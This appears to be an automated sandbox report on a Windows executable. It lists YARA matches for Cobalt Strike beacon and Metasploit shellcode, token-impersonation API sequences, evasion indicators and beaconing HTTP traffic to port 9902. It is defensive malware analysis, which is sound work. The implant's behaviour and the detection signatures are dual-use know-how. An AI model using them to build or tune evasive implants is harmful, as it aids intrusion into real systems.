Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: String function: 00827420 appears 37 times
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: String function: 00813760 appears 679 times
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: String function: 00812EE0 appears 99 times
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: String function: 00811520 appears 545 times

Source: 0.2.7xRIr23y7v.exe.17dea720000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 0.2.7xRIr23y7v.exe.17dea720000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 0.2.7xRIr23y7v.exe.17dea720000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 0.2.7xRIr23y7v.exe.17dea720000.1.unpack, type: UNPACKEDPE	Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.7xRIr23y7v.exe.17dea720000.1.unpack, type: UNPACKEDPE	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 0.2.7xRIr23y7v.exe.17dea720000.1.unpack, type: UNPACKEDPE	Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.7xRIr23y7v.exe.17dea720000.1.unpack, type: UNPACKEDPE	Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
Source: 0.2.7xRIr23y7v.exe.17dea720000.1.unpack, type: UNPACKEDPE	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.7xRIr23y7v.exe.17dea720000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.2.7xRIr23y7v.exe.17dea720000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
Source: 0.2.7xRIr23y7v.exe.17dea720000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 0.2.7xRIr23y7v.exe.17dea720000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 0.2.7xRIr23y7v.exe.17dea720000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 0.2.7xRIr23y7v.exe.17dea720000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.7xRIr23y7v.exe.17dea720000.1.raw.unpack, type: UNPACKEDPE	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 0.2.7xRIr23y7v.exe.17dea720000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.7xRIr23y7v.exe.17dea720000.1.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
Source: 0.2.7xRIr23y7v.exe.17dea720000.1.raw.unpack, type: UNPACKEDPE	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.7xRIr23y7v.exe.17dea720000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
Source: 00000000.00000002.2893779407.0000017DEA9A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000002.2893026267.0000017DE2BE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 00000000.00000002.2893026267.0000017DE2BE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 00000000.00000002.2892307594.000000C0000D4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 00000000.00000002.2892307594.000000C0000D4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
Source: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
Source: Process Memory Space: 7xRIr23y7v.exe PID: 6160, type: MEMORYSTR	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: Process Memory Space: 7xRIr23y7v.exe PID: 6160, type: MEMORYSTR	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: Process Memory Space: 7xRIr23y7v.exe PID: 6160, type: MEMORYSTR	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1/0@0/1

Source: C:\Users\user\Desktop\7xRIr23y7v.exe

Code function: 0_2_0000017DEA72FE24 LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,

0_2_0000017DEA72FE24

Source: C:\Users\user\Desktop\7xRIr23y7v.exe

Code function: 0_2_0000017DEA736C98 OpenProcess,TerminateProcess,GetLastError,CloseHandle,GetCurrentProcess,CreateToolhelp32Snapshot,Process32First,CloseHandle,OpenProcess,ProcessIdToSessionId,CloseHandle,Process32Next,CloseHandle,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,CloseHandle,htonl,htonl,OpenProcess,GetLastError,OpenProcessToken,GetLastError,ImpersonateLoggedOnUser,GetLastError,DuplicateTokenEx,GetLastError,ImpersonateLoggedOnUser,GetLastError,CloseHandle,CloseHandle,

0_2_0000017DEA736C98

Source: C:\Users\user\Desktop\7xRIr23y7v.exe

File opened: C:\Windows\system32\f591c309ca7467d16d6309d8028f4ddc6c625b7aee05f626968e6ba3b088c911AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Jump to behavior

Source: 7xRIr23y7v.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\7xRIr23y7v.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 7xRIr23y7v.exe	ReversingLabs: Detection: 52%
Source: 7xRIr23y7v.exe	Virustotal: Detection: 52%

Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Section loaded: rsaenh.dll	Jump to behavior

Source: C:\Users\user\Desktop\7xRIr23y7v.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: 7xRIr23y7v.exe

Static file information: File size 1087488 > 1048576

Source: 7xRIr23y7v.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\7xRIr23y7v.exe

Code function: 0_2_0000017DEA744C34 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_0000017DEA744C34

Source: 7xRIr23y7v.exe

Static PE information: section name: .symtab

Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_00803AB4 push E80000FCh; ret	0_2_00803AB9
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_00806489 push rcx; retf 0000h	0_2_0080648C
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_0000017DEA75515C push 0000006Ah; retf	0_2_0000017DEA755174
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_0000017DE2BE0128 push eax; ret	0_2_0000017DE2BE0364
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_0000017DE2BE02E7 push eax; ret	0_2_0000017DE2BE0364
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_0000017DEA346A42 push ebp; iretd	0_2_0000017DEA346A43
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_0000017DEA346A8B push ebp; iretd	0_2_0000017DEA346A8C
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_0000017DEA346A62 push ebp; iretd	0_2_0000017DEA346A63
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_0000017DEA329B65 push cs; retf	0_2_0000017DEA329B66
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_0000017DEA32B19F push ebp; iretd	0_2_0000017DEA32B1A0
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_0000017DEA3297A4 push edi; iretd	0_2_0000017DEA3297A5

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 9902
